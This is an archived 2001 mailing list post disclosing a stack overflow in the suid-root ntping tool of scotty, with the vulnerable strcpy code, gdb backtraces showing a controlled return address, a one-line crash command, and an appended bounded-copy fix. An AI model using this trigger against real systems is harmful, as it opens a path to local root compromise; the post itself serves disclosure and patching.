Vulnerability Development mailing list archives

suid scotty / ntping overflow


From: KF <dotslash () snosoft com>
Date: Sat, 09 Jun 2001 13:15:51 -0400

Here is the offending code; the attached letter has the general
information for this issue.

in /home/d0tslash/scotty-2.1.0/tnm/ntping/ntping.c 

char *hname;                        /* hostname */   
...
else {
        char tmp [512];
        struct hostent *hp;
        strcpy (tmp, hname);
        #ifdef HAVE__RES
        /* try to spend no longer than some seconds: */
        _res.retrans = 1, _res.retry = 3;
        #endif
        if ((hp = gethostbyname (tmp)))
...
  
Also ... I believe this is a second issue? The difference here is with the
.'s in the input: it crashes at make_addr() instead of gethostbyname() (see
original message).
... 
if (4 == sscanf (hname, "%d.%d.%d.%d", &a, &b, &c, &d))
{
        naddr = (a << 24) | (b << 16) | (c << 8) | d;
        naddr = ntohl (naddr);
        /** XXX hack alert - but what the heck ;-) **/


[root@linux ntping]# gdb ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40051b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40051b66 in getenv () from /lib/libc.so.6
#1  0x40112adb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x401139de in __res_ninit () from /lib/libc.so.6
#3  0x40116b69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x40117f5f in gethostbyname () from /lib/libc.so.6
#5  0x08049338 in make_addr ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141


-------- Original Message --------
Subject: suid scotty advisory soon
Date: Thu, 07 Jun 2001 19:05:01 -0400
From: KF <dotslash () snosoft com>
To: recon () snosoft com

Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/

What led me to research this:
arndt () aorta tat physik uni-tuebingen de (Michael Arndt) wrote:
  i run scotty-testsuite: what must i change on my system:(Linux
  slackware): 
  ==== Test generated error:
  can not connect straps socket: Permission denied
straps and ntping must be installed suid root.

^------- Hrmm I sure thought that was interesting to know *grin*

Vendors affected:
unknown by the author of this document 

just a note I found however...

<19990702221232.79B119410 () Galois suse de>
Hi folks,
here is the long promised posting of all suid/sgid files on an alpha of
SuSE Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-Roms so that's the reason for the
many many files ... (and too much suid/sgid ones ...)
...
-rwsr-xr-x   1 root     root        33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x   1 root     root        18352 Jun 30 11:11 ./usr/bin/straps
...

real world example:
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)

[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0  0x40079b66 in getenv () from /lib/libc.so.6
#1  0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2  0x4013b9de in __res_ninit () from /lib/libc.so.6
#3  0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4  0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5  0x080495b8 in _start ()
#6  0x41414141 in ?? ()
Cannot access memory at address 0x41414141

-KF
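
The two checks a maintainer would want for the copy and the dotted-quad parse quoted above, as an added example that is not scotty's code and not part of KF's post: copy_hostname(), hostname_fits(), run_of_a_fits() and quad_value() are names made up here, and the 255-character hostname limit is an assumed policy choice, not something the report states.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define TMP_SIZE  512   /* same size as tmp[] in ntping's make_addr() */
#define HNAME_MAX 255   /* RFC 1035 hostname limit (assumed policy here) */

/* Bounded replacement for the unchecked strcpy(tmp, hname):
 * 0 on success, -1 if the name does not fit (rejected, not truncated). */
int copy_hostname(char *dst, size_t dstsz, const char *hname)
{
    const char *nul = memchr(hname, '\0', dstsz);   /* never reads past dstsz */
    if (nul == NULL || (size_t)(nul - hname) > HNAME_MAX)
        return -1;
    memcpy(dst, hname, (size_t)(nul - hname) + 1);  /* includes the NUL */
    return 0;
}

/* Same 512-byte local buffer as the original, but with the bounded copy. */
int hostname_fits(const char *hname)
{
    char tmp[TMP_SIZE];
    return copy_hostname(tmp, sizeof tmp, hname);
}

/* Builds a run of `len` 'A's (the report's perl one-liner) and returns
 * whether the bounded copy accepts it (0) or rejects it (-1). */
int run_of_a_fits(size_t len)
{
    char *buf = malloc(len + 1);
    if (buf == NULL) return -1;
    memset(buf, 'A', len); buf[len] = '\0';
    int r = hostname_fits(buf);
    free(buf);
    return r;
}

/* Dotted-quad parser with per-octet range checks; the original
 * sscanf("%d.%d.%d.%d") accepts negative or >255 octets and trailing text.
 * Returns the address in host byte order, or -1 on a parse or range error. */
long long quad_value(const char *s)
{
    int a, b, c, d; char trailing;
    if (sscanf(s, "%d.%d.%d.%d%c", &a, &b, &c, &d, &trailing) != 4)
        return -1;
    if ((a | b | c | d) & ~0xff)                    /* an octet outside 0..255 */
        return -1;
    return ((long long)a << 24) | (b << 16) | (c << 8) | d;
}
```

With these in place the 9000-byte argument from the report is refused before any copy happens, so the crash in gethostbyname()/make_addr() cannot be reached that way.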
